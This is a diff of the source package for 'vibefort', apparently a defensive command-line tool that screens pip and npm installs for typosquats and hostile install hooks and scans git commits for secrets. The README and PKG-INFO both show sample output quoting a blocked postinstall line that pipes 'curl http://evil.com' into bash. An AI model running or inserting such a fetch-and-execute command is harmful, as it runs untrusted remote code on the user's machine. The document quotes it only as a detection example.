vibefort 0.1.0__tar.gz

vibefort-0.1.0/.gitignore

@@ -0,0 +1,18 @@
+__pycache__/
+*.pyc
+*.egg-info/
+dist/
+build/
+.venv/
+.pytest_cache/
+*.db
+.coverage
+node_modules/
+
+# Secrets and credentials
+.env
+.env.*
+*.pem
+*.key
+*.p12
+*.pfx

vibefort-0.1.0/LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2026 Berk
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

vibefort-0.1.0/PKG-INFO

@@ -0,0 +1,142 @@
+Metadata-Version: 2.4
+Name: vibefort
+Version: 0.1.0
+Summary: Security layer for AI-assisted development. One command, permanent protection.
+Author: Berk
+License-Expression: MIT
+License-File: LICENSE
+Keywords: cli,security,supply-chain,vibecoders
+Classifier: Development Status :: 3 - Alpha
+Classifier: Environment :: Console
+Classifier: Intended Audience :: Developers
+Classifier: License :: OSI Approved :: MIT License
+Classifier: Programming Language :: Python :: 3
+Classifier: Topic :: Security
+Requires-Python: >=3.10
+Requires-Dist: click>=8.0
+Requires-Dist: httpx>=0.27
+Requires-Dist: rich>=13.0
+Requires-Dist: toml>=0.10
+Provides-Extra: dev
+Requires-Dist: pytest-cov; extra == 'dev'
+Requires-Dist: pytest-httpx; extra == 'dev'
+Requires-Dist: pytest>=8.0; extra == 'dev'
+Description-Content-Type: text/markdown
+
+# 🏰 VibeFort
+
+**Security layer for AI-assisted development. One command, permanent protection.**
+
+VibeFort protects vibecoders (Cursor, Bolt, Replit, Claude Code users) from supply chain attacks, leaked secrets, and insecure AI-generated code. Run `vibefort install` once — it silently protects every package install and git commit forever.
+
+## Quick Start
+
+```bash
+pipx install vibefort
+vibefort install
+```
+
+That's it. You never type `vibefort` again.
+
+> **Why pipx?** VibeFort is a system-wide CLI tool, not a project dependency. `pipx` installs it globally in an isolated environment — the standard way to install Python CLI tools. [Install pipx](https://pipx.pypa.io/stable/installation/) if you don't have it: `brew install pipx` (macOS) or `apt install pipx` (Ubuntu).
+
+## What Happens After Install
+
+```bash
+# Normal pip usage — VibeFort intercepts silently
+$ pip install flask
+✔ flask 3.1.0 — clean (0.2s)
+
+$ pip install reqeusts
+✖ BLOCKED — Possible typosquat — similar to 'requests'
+  Did you mean: requests
+
+$ npm install evil-pkg
+✖ BLOCKED — suspicious postinstall script: downloads external payload
+  package.json: postinstall runs curl http://evil.com | bash
+
+# Normal git usage — VibeFort scans staged files
+$ git commit -m "add config"
+✖ VibeFort blocked this commit — 1 secret(s) found
+  Secret found in src/config.py:14
+  AWS Access Key detected
+```
+
+## Supported Package Managers
+
+VibeFort intercepts **10 package managers** across Python and Node.js:
+
+### Python
+
+| Manager | Commands intercepted |
+|---|---|
+| `pip` / `pip3` | `pip install flask`, `pip install flask==3.1.0` |
+| `uv` | `uv pip install flask`, `uv add flask` |
+| `pipx` | `pipx install black` |
+
+### Node.js
+
+| Manager | Commands intercepted |
+|---|---|
+| `npm` | `npm install`, `npm add`, `npm i` |
+| `npx` | `npx create-react-app` (scans before execute) |
+| `yarn` | `yarn add express` |
+| `pnpm` | `pnpm add express` |
+| `bun` | `bun add express` |
+| `bunx` | `bunx cowsay` (scans before execute) |
+
+> `npx` and `bunx` are especially dangerous — they download AND execute code in one step. VibeFort scans the package before allowing execution.
+
+## How It Works
+
+### Package Scanning (automatic)
+
+Every package install goes through two tiers:
+
+| Tier | What it checks | Speed | When |
+|---|---|---|---|
+| **Tier 1** | Known-safe cache (10k packages), typosquatting, registry existence, slopsquatting | < 500ms | Every install |
+| **Tier 2** | Downloads to temp, inspects setup.py/package.json hooks, .pth files, obfuscated code | 3-5s | Unknown packages |
+
+### Secret Scanning (automatic)
+
+Git pre-commit hook powered by [betterleaks](https://github.com/betterleaks/betterleaks) (234 detection rules):
+
+- AWS, OpenAI, Anthropic, GitHub, Stripe, Google API keys
+- SSH/PGP private keys, JWT tokens
+- Database connection strings
+- And 220+ more patterns
+
+### Coming Soon
+
+- `vibefort scan .` — code vulnerability scanning (SQL injection, XSS, insecure deserialization)
+- `vibefort infra .` — infrastructure auditing (Supabase, Firebase, open S3 buckets)
+- `vibefort audit` — system compromise check
+- AI-powered analysis with plain-English explanations
+
+## Commands
+
+| Command | Description |
+|---|---|
+| `vibefort install` | One-time setup: hooks + secret scanner |
+| `vibefort uninstall` | Clean removal of all hooks |
+| `vibefort status` | Dashboard with scan stats |
+| `vibefort --version` | Show version |
+
+## How Install Works
+
+`vibefort install` does two things that persist forever:
+
+1. **Shell hook** — Adds function wrappers to `~/.zshrc` or `~/.bashrc` that intercept all 10 package managers. Loads every time a terminal opens.
+
+2. **Git hook** — Sets a global pre-commit hook via `git config --global core.hooksPath`. Applies to every repo.
+
+A 🏰 castle icon appears in your terminal when VibeFort is active.
+
+`vibefort uninstall` cleanly removes both.
+
+## License
+
+MIT — see [LICENSE](LICENSE).
+
+Secret scanning powered by [betterleaks](https://github.com/betterleaks/betterleaks) (MIT). See [THIRD_PARTY_NOTICES](THIRD_PARTY_NOTICES).

vibefort-0.1.0/README.md

@@ -0,0 +1,117 @@
+# 🏰 VibeFort
+
+**Security layer for AI-assisted development. One command, permanent protection.**
+
+VibeFort protects vibecoders (Cursor, Bolt, Replit, Claude Code users) from supply chain attacks, leaked secrets, and insecure AI-generated code. Run `vibefort install` once — it silently protects every package install and git commit forever.
+
+## Quick Start
+
+```bash
+pipx install vibefort
+vibefort install
+```
+
+That's it. You never type `vibefort` again.
+
+> **Why pipx?** VibeFort is a system-wide CLI tool, not a project dependency. `pipx` installs it globally in an isolated environment — the standard way to install Python CLI tools. [Install pipx](https://pipx.pypa.io/stable/installation/) if you don't have it: `brew install pipx` (macOS) or `apt install pipx` (Ubuntu).
+
+## What Happens After Install
+
+```bash
+# Normal pip usage — VibeFort intercepts silently
+$ pip install flask
+✔ flask 3.1.0 — clean (0.2s)
+
+$ pip install reqeusts
+✖ BLOCKED — Possible typosquat — similar to 'requests'
+  Did you mean: requests
+
+$ npm install evil-pkg
+✖ BLOCKED — suspicious postinstall script: downloads external payload
+  package.json: postinstall runs curl http://evil.com | bash
+
+# Normal git usage — VibeFort scans staged files
+$ git commit -m "add config"
+✖ VibeFort blocked this commit — 1 secret(s) found
+  Secret found in src/config.py:14
+  AWS Access Key detected
+```
+
+## Supported Package Managers
+
+VibeFort intercepts **10 package managers** across Python and Node.js:
+
+### Python
+
+| Manager | Commands intercepted |
+|---|---|
+| `pip` / `pip3` | `pip install flask`, `pip install flask==3.1.0` |
+| `uv` | `uv pip install flask`, `uv add flask` |
+| `pipx` | `pipx install black` |
+
+### Node.js
+
+| Manager | Commands intercepted |
+|---|---|
+| `npm` | `npm install`, `npm add`, `npm i` |
+| `npx` | `npx create-react-app` (scans before execute) |
+| `yarn` | `yarn add express` |
+| `pnpm` | `pnpm add express` |
+| `bun` | `bun add express` |
+| `bunx` | `bunx cowsay` (scans before execute) |
+
+> `npx` and `bunx` are especially dangerous — they download AND execute code in one step. VibeFort scans the package before allowing execution.
+
+## How It Works
+
+### Package Scanning (automatic)
+
+Every package install goes through two tiers:
+
+| Tier | What it checks | Speed | When |
+|---|---|---|---|
+| **Tier 1** | Known-safe cache (10k packages), typosquatting, registry existence, slopsquatting | < 500ms | Every install |
+| **Tier 2** | Downloads to temp, inspects setup.py/package.json hooks, .pth files, obfuscated code | 3-5s | Unknown packages |
+
+### Secret Scanning (automatic)
+
+Git pre-commit hook powered by [betterleaks](https://github.com/betterleaks/betterleaks) (234 detection rules):
+
+- AWS, OpenAI, Anthropic, GitHub, Stripe, Google API keys
+- SSH/PGP private keys, JWT tokens
+- Database connection strings
+- And 220+ more patterns
+
+### Coming Soon
+
+- `vibefort scan .` — code vulnerability scanning (SQL injection, XSS, insecure deserialization)
+- `vibefort infra .` — infrastructure auditing (Supabase, Firebase, open S3 buckets)
+- `vibefort audit` — system compromise check
+- AI-powered analysis with plain-English explanations
+
+## Commands
+
+| Command | Description |
+|---|---|
+| `vibefort install` | One-time setup: hooks + secret scanner |
+| `vibefort uninstall` | Clean removal of all hooks |
+| `vibefort status` | Dashboard with scan stats |
+| `vibefort --version` | Show version |
+
+## How Install Works
+
+`vibefort install` does two things that persist forever:
+
+1. **Shell hook** — Adds function wrappers to `~/.zshrc` or `~/.bashrc` that intercept all 10 package managers. Loads every time a terminal opens.
+
+2. **Git hook** — Sets a global pre-commit hook via `git config --global core.hooksPath`. Applies to every repo.
+
+A 🏰 castle icon appears in your terminal when VibeFort is active.
+
+`vibefort uninstall` cleanly removes both.
+
+## License
+
+MIT — see [LICENSE](LICENSE).
+
+Secret scanning powered by [betterleaks](https://github.com/betterleaks/betterleaks) (MIT). See [THIRD_PARTY_NOTICES](THIRD_PARTY_NOTICES).

vibefort-0.1.0/SECURITY.md

@@ -0,0 +1,67 @@
+# Security Policy
+
+## Reporting a Vulnerability
+
+If you discover a security vulnerability in VibeFort, please report it responsibly.
+
+**Do NOT open a public GitHub issue for security vulnerabilities.**
+
+Instead, email: **security@vibefort.dev**
+
+Include:
+- Description of the vulnerability
+- Steps to reproduce
+- Impact assessment
+- Suggested fix (if you have one)
+
+We will acknowledge your report within 48 hours and aim to release a fix within 7 days for critical issues.
+
+## Scope
+
+VibeFort is a security tool that:
+- Modifies shell configuration files (`~/.zshrc`, `~/.bashrc`)
+- Sets global git hooks (`core.hooksPath`)
+- Downloads and executes a third-party binary (betterleaks)
+- Intercepts package manager commands (pip, npm, yarn, etc.)
+- Scans downloaded package contents in temporary directories
+
+All of these are high-trust operations. We take security seriously.
+
+## What We Consider Vulnerabilities
+
+- Shell injection via package names or manager arguments
+- Path traversal in archive extraction
+- Execution of malicious code during package scanning
+- Secret values (API keys, tokens) being logged or stored
+- Symlink attacks on `~/.vibefort/`
+- Bypass of scanning that allows malicious packages through
+- Tampering with the betterleaks binary after download
+
+## What We Don't Consider Vulnerabilities
+
+- `git commit --no-verify` bypassing the pre-commit hook (this is a git feature, not a bug)
+- Users with root/sudo access modifying VibeFort's files (if they have root, they don't need VibeFort to do damage)
+- Packages that are malicious but not detectable by static analysis (we can't catch everything)
+- False positives in typosquatting detection
+
+## Security Design Decisions
+
+- All subprocess calls use list form (no `shell=True`)
+- Manager arguments are validated against a whitelist before execution
+- Downloaded binaries are verified with SHA256 checksums (fail-closed)
+- `~/.vibefort/` is set to `0700`, config to `0600`
+- Secret values from betterleaks are never stored or logged
+- File scanning has a 10MB size limit and skips symlinks
+- Rich markup in user-controlled strings is escaped
+- `pip download` prefers wheels to avoid setup.py execution
+- `npm pack` uses `--ignore-scripts` to prevent script execution during scan
+
+## Supported Versions
+
+| Version | Supported |
+|---|---|
+| 0.1.x | Yes |
+
+## Acknowledgments
+
+We appreciate responsible disclosure. Security researchers who report valid vulnerabilities will be credited here (with permission).

vibefort-0.1.0/THIRD_PARTY_NOTICES

@@ -0,0 +1,11 @@
+This project bundles the following third-party software:
+
+## betterleaks
+
+- License: MIT
+- Repository: https://github.com/betterleaks/betterleaks
+- Copyright: Copyright (c) 2026 Zachary Rice
+
+betterleaks is used for secret detection in git commits.
+The full MIT license text is available at:
+https://github.com/betterleaks/betterleaks/blob/main/LICENSE